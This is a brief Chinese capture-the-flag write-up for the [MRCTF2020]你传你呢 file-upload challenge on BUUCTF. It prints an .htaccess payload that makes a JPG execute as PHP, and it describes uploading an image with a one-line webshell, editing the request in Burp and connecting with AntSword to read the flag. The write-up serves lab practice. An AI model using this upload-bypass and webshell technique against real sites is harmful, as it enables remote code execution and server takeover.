web:[MRCTF2020]你传你呢

题目

点进页面显示如下

上传文件,先随便上传一个文件看看情况

构造含有一句话木马的图片上传

访问显示错误

这里参考了大佬的wp,上传一个.htaccess文件,这个.htaccess文件的作用就是把这个图片文件解析成php代码执行

.htaccess文件的内容为

复制代码
<FilesMatch "2222.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

这里用bp抓包修改类型

上传成功

访问

复制代码
http://89577a55-c3b7-4c47-a9ef-4cafc3fd5fb4.node4.buuoj.cn:81/upload/f219c4e7db2f533060f7d3e3a21ed39b/2222.jpg

回显一片空白,说明木马上传成功

使用蚁剑链接

在根目录找到flag

得到flag

参考文章链接:

https://www.cnblogs.com/Jinx8823/p/16476006.html

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)_[mrctf2020]你传你 呢 1-CSDN博客

相关推荐
紫_龙8 分钟前
最新版vue3+TypeScript开发入门到实战教程之路由详解三
前端·javascript·typescript
-SOLO-13 分钟前
使用Cursor操控正在打开的Chrome
前端·chrome
chiwei_hua13 分钟前
如何在 Blazor Web 前端中使用 C# 进行数据交互?
前端·c#·交互
啥都想学点28 分钟前
pikachu靶场——File Inclusion(Kali系统)
网络安全
楠目28 分钟前
ThinkPHP 5.2 反序列化漏洞分析
网络安全
大方子31 分钟前
【PolarCTF2026年春季挑战赛】Signed_Too_Weak
网络安全·polarctf
jacklood1 小时前
使用STM32的迪文屏控制使用参考方式
前端·javascript·stm32
JS_SWKJ1 小时前
网闸:如何在“断连”中实现安全数据交换?
网络安全
KevinCyao1 小时前
Go短信营销接口示例代码:Golang高并发调用营销短信接口的实现方案与代码分享
android·前端·网络·golang·前端框架
Moyo2031 小时前
前端 -- react快速入门
前端·react.js·前端框架